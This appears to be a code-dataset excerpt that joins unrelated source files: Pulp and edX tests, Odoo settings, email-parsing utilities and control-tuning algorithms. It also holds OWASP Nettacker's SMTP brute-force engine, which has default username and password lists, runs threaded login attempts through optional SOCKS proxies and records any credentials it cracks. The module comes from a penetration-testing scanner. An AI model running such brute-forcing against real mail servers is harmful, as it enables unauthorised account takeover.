self.assertTrue(self.manager.association_exists(self.repo_id, self.unit_id_2,
self.unit_type_id))
mock_repo_qs.get_repo_or_missing_resource.assert_called_once_with(self.repo_id)
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_unassociate_via_criteria_no_matches(self, mock_ctrl):
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-2')
criteria_doc = {'type_ids': ['type-2']}
criteria = UnitAssociationCriteria.from_client_input(criteria_doc)
result = self.manager.unassociate_by_criteria(self.repo_id, criteria)
self.assertEquals(result, {})
self.assertTrue(self.manager.association_exists(self.repo_id, 'unit-1', 'type-1'))
self.assertTrue(self.manager.association_exists(self.repo_id, 'unit-2', 'type-1'))
| gpl-2.0 | 2,821,766,446,309,598,700 | 48.657407 | 99 | 0.658167 | false |
viraintel/OWASP-Nettacker | lib/brute/smtp/engine.py | 1 | 13303 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import time
import socks
import socket
import smtplib
import json
import string
import random
import os
from core.alert import *
from core.targets import target_type
from core.targets import target_to_host
from core.load_modules import load_file_path
from lib.socks_resolver.engine import getaddrinfo
from core._time import now
from core.log import __log_into_file
def extra_requirements_dict():
return {
"smtp_brute_users": ["admin", "root", "test", "ftp", "anonymous", "user", "support", "1"],
"smtp_brute_passwds": ["admin", "root", "test", "ftp", "anonymous", "user", "1", "12345",
"123456", "124567", "12345678", "123456789", "1234567890", "admin1",
"password!@#", "support", "1qaz2wsx", "qweasd", "qwerty", "!QAZ2wsx",
"password1", "1qazxcvbnm", "zxcvbnm", "iloveyou", "password", "p@ssw0rd",
"admin123", ""],
"smtp_brute_ports": ["25", "465", "587"],
"smtp_brute_split_user_set_pass": ["False"],
"smtp_brute_split_user_set_pass_prefix": [""]
}
def login(user, passwd, target, port, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename,
socks_proxy, scan_id, scan_cmd):
exit = 0
if socks_proxy is not None:
socks_version = socks.SOCKS5 if socks_proxy.startswith(
'socks5://') else socks.SOCKS4
socks_proxy = socks_proxy.rsplit('://')[1]
if '@' in socks_proxy:
socks_username = socks_proxy.rsplit(':')[0]
socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),
int(socks_proxy.rsplit(':')[-1]), username=socks_username,
password=socks_password)
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
else:
socks.set_default_proxy(socks_version, str(
socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1]))
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
while 1:
try:
if timeout_sec is not None:
server = smtplib.SMTP(target, int(port), timeout=timeout_sec)
else:
server = smtplib.SMTP(target, int(port))
server.starttls()
exit = 0
break
except:
exit += 1
if exit is retries:
warn(messages(language, "smtp_connection_timeout").format(
target, port, user, passwd))
return 1
time.sleep(time_sleep)
flag = 1
try:
server.login(user, passwd)
flag = 0
except smtplib.SMTPException as err:
pass
if flag is 0:
info(messages(language, "user_pass_found").format(
user, passwd, target, port))
data = json.dumps({'HOST': target, 'USERNAME': user, 'PASSWORD': passwd, 'PORT': port, 'TYPE': 'smtp_brute',
'DESCRIPTION': messages(language, "login_successful"), 'TIME': now(), 'CATEGORY': "brute",
'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n"
__log_into_file(log_in_file, 'a', data, language)
__log_into_file(thread_tmp_filename, 'w', '0', language)
else:
pass
try:
server.quit()
except Exception:
pass
return flag
def __connect_to_port(port, timeout_sec, target, retries, language, num, total, time_sleep, ports_tmp_filename,
thread_number, total_req, socks_proxy):
exit = 0
port = int(port)
if socks_proxy is not None:
socks_version = socks.SOCKS5 if socks_proxy.startswith(
'socks5://') else socks.SOCKS4
socks_proxy = socks_proxy.rsplit('://')[1]
if '@' in socks_proxy:
socks_username = socks_proxy.rsplit(':')[0]
socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),
int(socks_proxy.rsplit(':')[-1]), username=socks_username,
password=socks_password)
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
else:
socks.set_default_proxy(socks_version, str(
socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1]))
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
while 1:
try:
if timeout_sec is not None:
server = smtplib.SMTP(target, int(port), timeout=timeout_sec)
else:
server = smtplib.SMTP(target, int(port))
server.starttls()
server.quit()
exit = 0
break
except:
exit += 1
if exit is retries:
error(messages(language, "smtp_connection_failed").format(
target, port, str(num), str(total)))
try:
__log_into_file(ports_tmp_filename, 'a',
str(port), language)
except:
pass
break
time.sleep(time_sleep)
def test_ports(ports, timeout_sec, target, retries, language, num, total, time_sleep, ports_tmp_filename,
thread_number, total_req, verbose_level, socks_proxy):
# test smtp
_ports = ports[:]
threads = []
trying = 0
for port in _ports:
t = threading.Thread(target=__connect_to_port,
args=(
port, timeout_sec, target, retries, language, num, total, time_sleep,
ports_tmp_filename, thread_number, total_req, socks_proxy))
threads.append(t)
t.start()
trying += 1
if verbose_level > 3:
info(messages(language, "trying_message").format(
trying, total_req, num, total, target, port, 'smtp_brute'))
while 1:
n = 0
for thread in threads:
if thread.isAlive():
n += 1
else:
threads.remove(thread)
if n >= thread_number:
time.sleep(0.01)
else:
break
while 1:
n = True
for thread in threads:
if thread.isAlive():
n = False
time.sleep(0.01)
if n:
break
_ports = list(set(open(ports_tmp_filename).read().rsplit()))
for port in _ports:
try:
ports.remove(int(port))
except:
try:
ports.remove(port)
except:
pass
os.remove(ports_tmp_filename)
return ports
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep,
language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function
if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(target) != 'HTTP':
# requirements check
new_extra_requirements = extra_requirements_dict()
if methods_args is not None:
for extra_requirement in extra_requirements_dict():
if extra_requirement in methods_args:
new_extra_requirements[
extra_requirement] = methods_args[extra_requirement]
extra_requirements = new_extra_requirements
if users is None:
users = extra_requirements["smtp_brute_users"]
if passwds is None:
passwds = extra_requirements["smtp_brute_passwds"]
if ports is None:
ports = extra_requirements["smtp_brute_ports"]
if extra_requirements["smtp_brute_split_user_set_pass"][0] not in ["False", "True"]:
extra_requirements["smtp_brute_split_user_set_pass"][0] = "False"
if target_type(target) == 'HTTP':
target = target_to_host(target)
threads = []
total_req = int(
len(users) * len(passwds) * len(ports) * len(extra_requirements["smtp_brute_split_user_set_pass_prefix"])) \
if extra_requirements["smtp_brute_split_user_set_pass"][0] == "False" \
else int(len(users) * len(ports) * len(extra_requirements["smtp_brute_split_user_set_pass_prefix"]))
thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
random.choice(string.ascii_letters + string.digits) for _ in range(20))
ports_tmp_filename = '{}/tmp/ports_tmp_'.format(load_file_path()) + ''.join(
random.choice(string.ascii_letters + string.digits) for _ in range(20))
__log_into_file(thread_tmp_filename, 'w', '1', language)
__log_into_file(ports_tmp_filename, 'w', '', language)
ports = test_ports(ports, timeout_sec, target, retries, language, num, total, time_sleep, ports_tmp_filename,
thread_number, total_req, verbose_level, socks_proxy)
trying = 0
if extra_requirements["smtp_brute_split_user_set_pass"][0] == "False":
for port in ports:
for user in users:
for passwd in passwds:
t = threading.Thread(target=login, args=(
user, passwd, target, port, timeout_sec, log_in_file, language, retries, time_sleep,
thread_tmp_filename, socks_proxy,
scan_id, scan_cmd))
threads.append(t)
t.start()
trying += 1
if verbose_level > 3:
info(messages(language, "trying_message").format(trying, total_req, num, total, target, port,
'smtp_brute'))
while 1:
n = 0
for thread in threads:
if thread.isAlive():
n += 1
else:
threads.remove(thread)
if n >= thread_number:
time.sleep(0.01)
else:
break
else:
keyboard_interrupt_flag = False
for port in ports:
for user in users:
for prefix in extra_requirements["smtp_brute_split_user_set_pass_prefix"]:
t = threading.Thread(target=login, args=(user, user.rsplit('@')[0] + prefix, target, port,
timeout_sec, log_in_file, language,
retries, time_sleep, thread_tmp_filename))
threads.append(t)
t.start()
trying += 1
if verbose_level > 3:
info(messages(language, "trying_message").format(trying, total_req, num, total, target, port,
'smtp_brute'))
while 1:
try:
if threading.activeCount() >= thread_number:
time.sleep(0.01)
else:
break
except KeyboardInterrupt:
keyboard_interrupt_flag = True
break
if keyboard_interrupt_flag:
break
else:
break
else:
break
# wait for threads
kill_switch = 0
kill_time = int(
timeout_sec / 0.1) if int(timeout_sec / 0.1) is not 0 else 1
while 1:
time.sleep(0.1)
kill_switch += 1
try:
if threading.activeCount() is 1 or kill_switch is kill_time:
break
except KeyboardInterrupt:
break
thread_write = int(open(thread_tmp_filename).read().rsplit()[0])
if thread_write is 1 and verbose_level is not 0:
data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'smtp_brute',
'DESCRIPTION': messages(language, "no_user_passwords"), 'TIME': now(), 'CATEGORY': "brute",
'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n"
__log_into_file(log_in_file, 'a', data, language)
os.remove(thread_tmp_filename)
else:
warn(messages(language, "input_target_error").format(target))
| apache-2.0 | -7,298,699,669,627,891,000 | 43.343333 | 122 | 0.496655 | false |
arbrandes/edx-platform | lms/djangoapps/commerce/management/commands/tests/test_create_orders_for_old_enterprise_course_enrollmnet.py | 4 | 4541 | """
Test the create_orders_for_old_enterprise_course_enrollment management command
"""
import re
from io import StringIO
from unittest.mock import patch
from django.core.management import call_command
from django.test import TestCase, override_settings
from common.djangoapps.course_modes.models import CourseMode
from common.djangoapps.student.tests.factories import CourseEnrollmentFactory, UserFactory
from openedx.core.djangoapps.credit.tests.test_api import TEST_ECOMMERCE_WORKER
from openedx.core.djangolib.testing.utils import skip_unless_lms
from openedx.features.enterprise_support.tests.factories import (
EnterpriseCourseEnrollmentFactory,
EnterpriseCustomerUserFactory
)
@skip_unless_lms
@override_settings(ECOMMERCE_SERVICE_WORKER_USERNAME=TEST_ECOMMERCE_WORKER)
class TestEnterpriseCourseEnrollmentCreateOldOrder(TestCase):
"""
Test create_orders_for_old_enterprise_course_enrollment management command.
"""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
UserFactory(username=TEST_ECOMMERCE_WORKER)
cls._create_enterprise_course_enrollments(30)
@classmethod
def _create_enterprise_course_enrollments(cls, count):
"""
Creates `count` test enrollments plus 1 invalid and 1 Audit enrollment
"""
for _ in range(count):
user = UserFactory()
course_enrollment = CourseEnrollmentFactory(mode=CourseMode.VERIFIED, user=user)
course = course_enrollment.course
enterprise_customer_user = EnterpriseCustomerUserFactory(user_id=user.id)
EnterpriseCourseEnrollmentFactory(enterprise_customer_user=enterprise_customer_user, course_id=course.id)
# creating audit enrollment
user = UserFactory()
course_enrollment = CourseEnrollmentFactory(mode=CourseMode.AUDIT, user=user)
course = course_enrollment.course
enterprise_customer_user = EnterpriseCustomerUserFactory(user_id=user.id)
EnterpriseCourseEnrollmentFactory(enterprise_customer_user=enterprise_customer_user, course_id=course.id)
# creating invalid enrollment (with no CourseEnrollment)
user = UserFactory()
enterprise_customer_user = EnterpriseCustomerUserFactory(user_id=user.id)
EnterpriseCourseEnrollmentFactory(enterprise_customer_user=enterprise_customer_user, course_id=course.id)
@patch('lms.djangoapps.commerce.management.commands.create_orders_for_old_enterprise_course_enrollment'
'.Command._create_manual_enrollment_orders')
def test_command(self, mock_create_manual_enrollment_orders):
"""
Test command with batch size
"""
mock_create_manual_enrollment_orders.return_value = (0, 0, 0, []) # not correct return value, just fixes unpack
out = StringIO()
call_command('create_orders_for_old_enterprise_course_enrollment', '--batch-size=10', stdout=out)
output = out.getvalue()
assert 'Total Enrollments count to process: 32' in output
# 30 + 1 + 1
assert re.search(r'\[Final Summary\] Enrollments Success: \d+, New: \d+, Failed: 0, Invalid: 1 , Non-Paid: 1',
output)
# There are total 32 enrollments so there would be 4 batches (i.e: [10, 10, 10, 2])
# as there are 2 enrollments in last batch and that 2 enrollments are not valid enrollment to process,
# so _create_manual_enrollment_orders will not be called for last batch.
assert mock_create_manual_enrollment_orders.call_count == 3
@patch('lms.djangoapps.commerce.management.commands.create_orders_for_old_enterprise_course_enrollment'
'.Command._create_manual_enrollment_orders')
def test_command_start_and_end_index(self, mock_create_manual_enrollment_orders):
"""
Test command with batch size
"""
mock_create_manual_enrollment_orders.return_value = (0, 0, 0, []) # not correct return value, just fixes unpack
out = StringIO()
call_command(
'create_orders_for_old_enterprise_course_enrollment',
'--start-index=5',
'--end-index=20',
'--batch-size=10',
'--sleep-time=0.5',
stdout=out
)
output = out.getvalue()
assert 'Total Enrollments count to process: 15' in output
assert '[Final Summary] Enrollments Success: ' in output
assert mock_create_manual_enrollment_orders.call_count == 2
# batch of 2 (10, 5)
| agpl-3.0 | 7,827,564,943,324,703,000 | 45.336735 | 120 | 0.692138 | false |
Aravinthu/odoo | addons/product/models/res_config_settings.py | 11 | 2086 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
class ResConfigSettings(models.TransientModel):
_inherit = 'res.config.settings'
company_share_product = fields.Boolean(
'Share product to all companies',
help="Share your product to all companies defined in your instance.\n"
" * Checked : Product are visible for every company, even if a company is defined on the partner.\n"
" * Unchecked : Each company can see only its product (product where company is defined). Product not related to a company are visible for all companies.")
group_uom = fields.Boolean("Units of Measure", implied_group='product.group_uom')
group_product_variant = fields.Boolean("Attributes and Variants", implied_group='product.group_product_variant')
group_stock_packaging = fields.Boolean('Product Packages',
implied_group='product.group_stock_packaging')
group_sale_pricelist = fields.Boolean("Use pricelists to adapt your price per customers",
implied_group='product.group_sale_pricelist',
help="""Allows to manage different prices based on rules per category of customers.
Example: 10% for retailers, promotion of 5 EUR on this product, etc.""")
group_product_pricelist = fields.Boolean("Show pricelists On Products",
implied_group='product.group_product_pricelist')
group_pricelist_item = fields.Boolean("Show pricelists to customers",
implied_group='product.group_pricelist_item')
@api.model
def get_values(self):
res = super(ResConfigSettings, self).get_values()
product_rule = self.env.ref('product.product_comp_rule')
res.update(
company_share_product=not bool(product_rule.active),
)
return res
def set_values(self):
super(ResConfigSettings, self).set_values()
product_rule = self.env.ref('product.product_comp_rule')
product_rule.write({'active': not bool(self.company_share_product)})
| agpl-3.0 | 9,105,499,386,824,484,000 | 49.878049 | 168 | 0.691275 | false |
radical-software/mongo-mail-web | mongo_mail_web/utils.py | 1 | 5870 | # -*- coding: utf-8 -*-
import operator
import base64
import zlib
import json
import re
import logging
from datetime import datetime
from email.utils import parseaddr
from IPy import IP
from dateutil import tz
from . import constants
logger = logging.getLogger(__name__)
reg_received = re.compile(r'^.*\[(?P<host_ip>[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\].*')
def percent_calcul(current, before, fieldname):
"""
:current: dict
:before: dict
:fieldname: str
Va: Arrival Value
Vd: Depart Value
((Va-Vd)/Vd)*100
"""
va = current[fieldname]
vd = before[fieldname]
try:
#((Va-Vd)/Vd)*100
return (operator.truediv((va - vd), vd))*100
except:
return 0
#TODO: voir benchmark - time et storage: http://tukaani.org/lzma/benchmarks.html
def compress(data):
return base64.b64encode(zlib.compress(data))
def uncompress(data):
return zlib.decompress(base64.b64decode(data))
def check_ipv4(value):
try:
return IP(value).version() == 4
except:
return False
def check_ipv6(value):
try:
return IP(value).version() == 6
except:
return False
def is_public_address(address):
try:
return IP(address).iptype() == 'PUBLIC'
except:
return False
def timestamp():
dt = datetime.utcnow()
return datetime(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond, tz.tzutc())
def parse_received(receives,
exclude=['127.0.0.1', '::1']):
"""Récupération et parsing des champs Received"""
if not receives:
return []
objects = []
i=0
for receive in receives:
try:
r = receive.replace('\t', ' ').replace('\n', ' ').strip()
f = r[:4].lower()
if (f.find('by') < 0) and (f.find('from') < 0): continue
if (r.find('[') < 0) or (r.find(']') < 0): continue
#Baruwa:
#re.compile(r'(^Received:|X-Originating-IP:)')
#Moi:
#re.compile(r'^.*\[(?P<host_ip>[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\].*')
m = reg_received.match(r)
if not m:
logger.warning("process_received - regexp None : %s" % r )
continue
host_ip = m.group('host_ip')
if host_ip is None:
logger.warning("process_received - host_ip None : %s" % r )
continue
if host_ip in exclude:
continue
if not is_public_address(host_ip):
continue
try:
#date_receive_str = r.split(';')[1].strip()
#TOOD: Optimisations
#date_receive = normalize_datetime(email.utils.parsedate( date_receive_str ))
objects.append(host_ip)
"""
dict(host_ip=host_ip,
host_name=None, # TODO: StatMailReceived.host_name pas implémenté ???
date_receive=date_receive,
order_sort=i ))
"""
except Exception, err:
logger.warning("process_received - err1[%s] : %s" % (str(err), r))
i=i+1
except Exception, err:
logger.warning("process_received - err2[%s] : %s" % (str(err), r))
return objects
def get_quarantine_id(headers):
"""
X-Quarantine-ID: <k54m-OMYr-Jw>
parseaddr('<k54m-OMYr-Jw>')
('', 'k54m-OMYr-Jw')
"""
if constants.HEADER_QUARANTINE:
v = headers.get(constants.HEADER_QUARANTINE, '')
addr = parseaddr(v)
if addr and len(addr) == 2:
id = addr[1]
if id and len(id) > 0:
return id
def get_is_bounce(msg, sender=None):
"""
content_type = multipart/report
Sender commençant par prvs=
BATV rien à voir avec les bounce: c'est pour générer un tag de signature sur les mails sortant
pour chaque recipient
[email protected]
http://en.wikipedia.org/wiki/Bounce_Address_Tag_Validation
BATV
http://babel.de/batv.html
"""
if not sender:
return True
if sender in ["", "<>"]:
return True
if msg.content_type.value.lower() in ['multipart/report', 'message/delivery-status']:
return True
if msg.content_type.is_multipart():
for part in msg.parts:
if part.content_type.value.lower() in ['multipart/report', 'message/delivery-status']:
return True
return False
def get_is_spam(headers):
"""Champs X-Spam-Flag"""
if constants.HEADER_IS_SPAM in headers:
v = headers.get(constants.HEADER_IS_SPAM, '')
if v.strip().upper() == 'YES':
return True
return False
def get_is_banned(headers):
"""Champs X-Amavis-Alert"""
if constants.HEADER_IS_BANNED in headers:
value = headers.get(constants.HEADER_IS_BANNED, '')
# TODO: IMPORTANT Récupérer liste banned
if constants.SEARCH_BANNED in value:
return True
return False
def get_is_virus(headers):
"""Champs X-Amavis-Alert"""
if constants.HEADER_IS_VIRUS in headers:
value = headers.get(constants.HEADER_IS_VIRUS, '')
if constants.SEARCH_VIRUS in value:
return True
return False
def get_is_unchecked(headers):
if constants.HEADER_IS_UNCHECKED in headers:
value = headers.get(constants.HEADER_IS_UNCHECKED, '')
if constants.SEARCH_UNCHECKED in value:
return True
return False
| bsd-3-clause | 2,407,284,289,076,300,300 | 24.814978 | 105 | 0.535154 | false |
AlCap23/Thesis | Python/Algorithms.py | 1 | 20278 | # coding: utf8
"""
Contains the Python package for Algorithm used
"""
# Import numpy
import numpy as np
# Step Information of SISO system
def Step_Info(y,t, p=0.02, yr = 1):
"""
Returns the Rise Time, Overshoot, Settling Time and Steady State
of a given signal. Requires y, yr, t and optional a percentage for settling time
"""
# Check for Steady State
# Does series converge?
yss = y[-1]
# Get the rising time as the time
# First value above 0.1 steady state
index1 = np.where(y>0.1*yss)
# First value equal 0.9 steady state
index2 = np.where(y>0.9*yss)
# Rising Time
# Check if empty
if index1[0].size == 0:
t_rise = np.NaN
elif index2[0].size == 0:
t_rise = np.NaN
else:
t_rise = t[index2[0][-1]]-t[index1[0][0]]
# Overshoot for values above steady state
# Get all values
mp = np.abs(y[np.where(abs(y)>abs(yss))])
# Check if empty
if mp.size == 0:
mp = 0.
else:
mp = np.abs((np.max(mp)-np.abs(yss))/np.abs(yss))
# Settling time for all value between a certain percentage
index = np.where(np.logical_and(abs(y)<(1+p)*abs(yss), abs(y)>(1-p)*abs(yss)))
# Ceck if empty
if index[0].size ==0:
t_settle = np.NaN
else:
t_settle = t[index[0][0]] -t[0]
return t_rise,mp,t_settle,yss
def Disturbance_Info(y,t,p=0.02):
# Check for Steady State
# Does series converge to original value
yr = y[0]
if np.abs(y[-1]-yr) < 1e-2 :
yss = y[-1]
else:
yss = y[0]
# Maximum Overshoot for values above steady state
# Get all values
mp = np.abs(y-yss)
mp_max = np.argmax(mp)
if mp[mp_max] < 1e-5:
tp = 0.
else:
tp = t[mp_max]-t[0]
# Check if empty
if mp.size == 0:
mp = 0.
else:
mp = mp[mp_max]
# Settling time for all value between a certain percentage, after overshoot
if abs(yss) < 1e-2:
index = np.where(np.logical_and(abs(y[mp_max:])<(+p), abs(y[mp_max:])>(-p)))
else:
index = np.where(np.logical_and(abs(y[mp_max:])<(1+p)*yss, abs(y[mp_max:])>(1-p)*yss))
# Ceck if empty
if index[0].size ==0:
t_settle = 0.
elif mp < 1e-3 :
t_settle = 0.
else:
t_settle = t[index[0][0]] - t[0]
return tp,mp,t_settle,yss
# Integral Identification of first order time delay
def Integral_Identification(y,u,t):
"""Returns a FOTD Model from the given data.
y - array of outputs
u - array of inputs -> Maybe change to scalar!
t - array of time values
"""
# If the output is zero return emtpy function
if np.max(abs(y)) == 0:
return 0,0,0
# Truncate for Maximum value of abs(y) has reached 98 %
#i_end = np.argmax(abs(y),axis=0)
i_end = np.argmax(abs(y)[np.where(abs(y)<=0.98*np.max(abs(y)))])
# If Last indice is used
if i_end <= 0:
i_end = 1
yp = y[0:i_end]
up = u[0:i_end]
tp = t[0:i_end]
# Get steady state Gain
KM = (y[np.argmax(abs(y),axis=0)]-y[0])/(u[-1])
# Get the Residence Time
Tar = 1/np.abs(up[-1])*np.sign(up[0])/KM * np.trapz(yp[-1]-yp,tp)
# Time Constant
T = 1/np.abs(up[-1])*np.sign(up[0])* np.exp(1)/KM*np.trapz(yp[np.where(tp<=Tar)],tp[np.where(tp<=Tar)])
# Delay
L = Tar-T
# Check if all arguments are valid
if (T < 0):
print("Error - Negative lag - Using 20 instead")
T = 20
if (L < 1e-2):
print("Error - Small delay - Using 0 instead")
if (L > 0):
L = 0
else:
L = 0
return KM,T,L
# Algrotihm for computing gain of first order time delay
def FOTD_Gain(K,T,L,w=0):
"""Computes the gain of a first order time delay system at a given frequency"""
# Check if all dimensions match
if (K.shape != T.shape) or (K.shape != L.shape) or (L.shape != T.shape):
print("Shapes of parameter array are not equal!")
return np.NaN
# Steady State
if w==0:
return K
# System Dimension
if K.ndim == 1:
# Using system Identity by multiplying with the complex conjugate
G = 1/(T**2 * w**2 +1)*(K-1j*T*w)*(np.cos(-L*w)+1j*np.sin(-L*w))
else:
outputs,inputs = K.shape
# Create a system within the complex numbers
G = np.zeros_like(K, dtype=complex)
for i in range(0,inputs):
for o in range(0,outputs):
# Using system Identity by multiplying with the complex conjugate
G[o][i] = 1 /(T[o][i]**2 * w**2 +1) * ( K[o][i] - 1j*T[o][i]*w) *(np.cos(-L[o][i]*w)+1j*np.sin(-L[o][i]*w))
return G
# Algorithm for computing the RGA
def RGA(K,T,L,w=0):
"""Takes a FOTD System and computes the RGA of the system"""
if (K.shape != T.shape) or (K.shape != L.shape) or (L.shape != T.shape):
print("Shapes of parameter array are not equal!")
# Compute the System
G = FOTD_Gain(K,T,L,w)
# Calculate the RGA
RGA = np.multiply(G, np.transpose(np.linalg.inv(G)))
return RGA
# Algorithm for AMIGO Tuning
def AMIGO_Tune(K,T,L, structure = 'PI', Minimal_Delay=0.3):
"""Computes the PI(D) controller parameter based on AMIGO algorithm;
Parameter are returned as parallel notation KP,KI,KD and set point;
Needs first order time delay parameter as input
"""
# Check for small delay
if L < Minimal_Delay*T:
if Minimal_Delay*T < 1e-2:
L_P = 1e-2
else:
L_P = Minimal_Delay*T
else:
L_P = L
# PI Controller
if structure == 'PI':
# Parameter as Defined in Aström et. al., Advanced PID Control,p.229
KP = 0.15/K + (0.35 - L_P*T /(L_P+T)**2)*T/(K*L_P)
TI = 0.35*L_P+(13*L_P*T**2)/(T**2+12*L_P*T+7*L_P**2)
TD = 0.0
# Set Point Weight, Derived from Fig. 7.2, p. 230
if L/(T+L) < 0.2:
b = 0.0
elif L/(T+L) > 0.3:
b = 1.0
else:
# Approximate as Linear Function
b = 0.0 + (1.0 - 0.0)/(0.3-0.2)*(L/(T+L)-0.2)
elif structure == 'PID':
KP = 1/K*(0.2+0.45*T/L_P)
TI = (0.4*L_P + 0.8*T)/(L_P+0.1*T)*L
TD = (0.5*L_P*T)/(0.3*L_P+T)
# Set Point Weight, as given on p.235
# PRÜFEN!!!
if L/(T+L) > 0.5:
b = 1
else:
b = 0.0
else:
print("Undefined controller Structure")
return np.NaN
KI = KP/TI
KD = KP*TD
return [KP,KI,KD],b
# Algortihm for AMIGO Detuning
def AMIGO_DETUNE(K,T,L,params,KP, MS = 1.4, structure = 'PI'):
"""Detunes the AMIGO parameter according to Astrom"""
# Check for small delay
if L < 1e-1:
L = 1e-1
# Calculate normalized Time
tau = L/(L+T)
# Needed Parameter
alpha_D = (MS-1)/MS # See p.255 Eq. 7.19
beta_D = MS*(MS+np.sqrt(MS**2-1))/2# See p.257 Eq. 7.24
# Define old set of parameter
KP0 = params[0]
KI0 = params[1]
KD0 = params[2]
if structure=='PI':
# Use normalized time to determine Process as explained on p.255 f.
if tau > 0.1:
KI = KI0*(K*KP+alpha_D)/(K*KP0+alpha_D)
else:
# Needed constrain for switch case,See p. 258 Eq. 7.27
c = KP*K - KP0*K*(L+T)/(beta_D*(alpha_D+KP*K)) - alpha_D
if c < 0:
KI = beta_D*(alpha_D+KP*K)**2/(K*(L+T))
else:
KI = KI0*(alpha_D+KP*K)/(alpha_D+KP0*K)
return [KP,KP/KI,0.0]
if structure == 'PID':
print("Not implemented")
return np.NaN
else:
print("Undefined controller Structure")
return np.NaN
# ALgorithm for computing decentralized controller based on RGA
def Control_Decentral(K,T,L, w = 0, b=np.empty, structure = 'PI', pairing = np.empty):
""" Computes decentralised controller with AMIGO algorithm based on RGA pairing"""
# Compute SISO Case
if K.ndim <= 1:
# Using system Identity by multiplying with the complex conjugate
params, b0 = AMIGO_Tune(K,T,L)
# If b is not given, use b from AMIGO
if b == np.empty:
B = b0
#Kr = [b0*params[0], params[1], params[2]]
Ky = params
else:
B = b
Ky = params
D = 1
# Compute general MIMO Case
else:
# Systems dimensions
outputs,inputs = K.shape
# Create an empty controller
Ky = np.zeros([outputs,inputs,3])
B = np.zeros([outputs,inputs])
D = np.eye(outputs,inputs)
# Compute RGA -> Checks for Shape
LG = RGA(K,T,L,w)
# Get Pairing as an array for every column
if pairing == np.empty:
Pairing = np.argmax(LG, axis=0)
else:
Pairing = pairing
# Iterate through the pairing
for o in range(0,outputs):
# Best Pairing
i = Pairing[o]
# Compute controller via recursion
Ky[o][i],B[o][i],d = Control_Decentral(K[o][i],T[o][i],L[o][i],b)
return Ky, B, D
# Algorithm for computing a decoupling control based on Aström
def Control_Astrom(K,T,L,H, MS= None, w = 0, b=np.empty, structure = 'PI'):
"""Computes a Decoupling Controller via Aström Algortihm based on FOTD"""
# Check Input for Maximum Sensitivity
if MS is None:
MS = 1.4*np.eye(K.shape[0],K.shape[1])
# Compute Determinant of Maximum Sensitivity
ms = np.linalg.det(MS)
# Compute SISO Case
if K.ndim <= 1:
return Control_Decentral(K,T,L,w,b,structure)
# Compute General MIMO Case
else:
# Systems dimensions
outputs,inputs = K.shape
# Check dimensions
if (K.shape != T.shape) or (K.shape != H.shape) or (K.shape != MS.shape) or (K.shape != L.shape) or (L.shape != T.shape):
print("Shapes of parameter array are not equal!")
return np.NaN
# Create an empty controller
Ky = np.empty([outputs,inputs,3])
B = np.empty([outputs,inputs])
# Compute the decoupler
D = np.linalg.inv(K)
# Compute the interaction indeces
# Since d/ds(Q*K) = d/ds(Q)*K = d/ds(G) we can write the Taylor coefficient
Gamma = np.abs(np.dot(np.multiply(-K,T+L),D))
#print(Gamma)
# Set main diagonal to zero
np.fill_diagonal(Gamma,0)
# Get the maximum of each row
GMax = np.argmax(Gamma,axis=1)
#print(GMax)
# Get the new System
Tt = np.dot(np.multiply(K,np.add(T,L)),D)-np.diag(np.max(L,axis=1))#np.dot(K,np.dot(np.transpose(np.add(T,L)),D))-np.diag(np.max(L,axis=1))
Lt = np.diag(np.max(np.transpose(L),axis=0))
Kt = np.eye(K.shape[0],K.shape[1])
# Iterate through the outputs
for o in range(0,outputs):
# Estimate the new system parameter
# Get the maximal delay
#l = np.max(L[o][:])
l = Lt[o][o]
# Add the systems gain -> scaled to 1 because of inversion
k = Kt[o][o]
# Get the array of gains
# Get the system time constant as weighted sum
t = Tt[o][o]
# Calculate the detuning frequency
R = 0.8
wc_min = 2.0/R * (t+l)/((t+l)**2 + t**2)
# Design a controller based on estimated system
ky, b0, d = Control_Decentral(k,t,l,w,b,structure)
# Test for Interaction
# We detune the controller of the n-th output in such a way that the maximum of the n-th row is sufficiently small
# Current maximum interaction
gmax = Gamma[GMax[o]][o]
# Check for set point weight, either given
if b == np.empty:
# Or computed from AMIGO_TUNE
b = b0
# Check for structure
if structure == 'PI':
# Set counter for while
counter=0
# Set shrinking rate
shrink_rate = 0.9
# Check if decoupling is needed
while (np.abs(H[o][o]/(ms*gmax)) - np.sqrt( (b*ky[0]*wc_min)**2 + ky[1]**2 ) < 0):
if counter > 5:
#print('Maximal Iteration for detuning reached! Abort')
break
# Detune the controller with the shrinking rate
ky = AMIGO_DETUNE(k,t,l,ky,shrink_rate*ky[0])
# Increment counter
counter += 1
print("Aström Detuning Iterations:" +str(counter))
# Get the controller parameter
Ky[o][o][:] = ky
B[o][o] = b
